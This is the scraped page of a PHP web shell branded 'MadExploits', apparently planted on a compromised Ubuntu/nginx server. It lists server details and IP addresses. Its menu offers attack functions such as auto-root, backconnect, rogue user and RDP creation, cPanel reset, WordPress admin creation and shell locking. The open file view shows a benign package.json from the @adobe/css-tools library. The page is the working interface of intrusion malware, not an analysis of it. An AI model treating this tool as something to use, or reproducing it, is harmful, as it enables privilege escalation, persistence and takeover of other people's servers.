Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
@adobe /
css-tools /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
dr-xr-xr-x
LICENSE
1.13
KB
-rw-rw-rw-
Readme.md
7.57
KB
-rw-rw-rw-
package.json
1.48
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "@adobe/css-tools", "version": "4.4.1", "description": "CSS parser / stringifier", "source": "src/index.ts", "main": "./dist/index.cjs", "module": "./dist/index.mjs", "exports": { "import": "./dist/index.mjs", "types": "./dist/types.d.ts", "require": "./dist/index.cjs" }, "types": "./dist/types.d.ts", "type": "module", "files": [ "dist", "Readme.md" ], "devDependencies": { "@parcel/packager-ts": "2.13.0", "@parcel/transformer-typescript-types": "2.13.0", "@types/benchmark": "^2.1.1", "@types/bytes": "^3.1.1", "@types/jest": "^29.5.3", "@types/node": "^22.7.5", "benchmark": "^2.1.4", "bytes": "^3.1.0", "gts": "^6.0.2", "jest": "^29.6.2", "parcel": "^2.13.0", "ts-jest": "^29.1.1", "typescript": "^5.0.2" }, "scripts": { "benchmark": "node benchmark/index.mjs", "test": "jest", "clean": "gts clean && rm -rf ./dist", "build": "parcel build && node ./utils/fix-type-generation.cjs", "fix": "gts fix", "lint": "gts lint", "prepack": "npm run build", "prepare": "npm run build", "pretest": "npm run build", "posttest": "npm run lint" }, "author": "TJ Holowaychuk <tj@vision-media.ca>", "contributors": [ "Jean-Philippe Zolesio <holblin@gmail.com>" ], "license": "MIT", "repository": { "type": "git", "url": "https://github.com/adobe/css-tools.git" }, "keywords": [ "css", "parser", "stringifier", "stylesheet" ] }
Close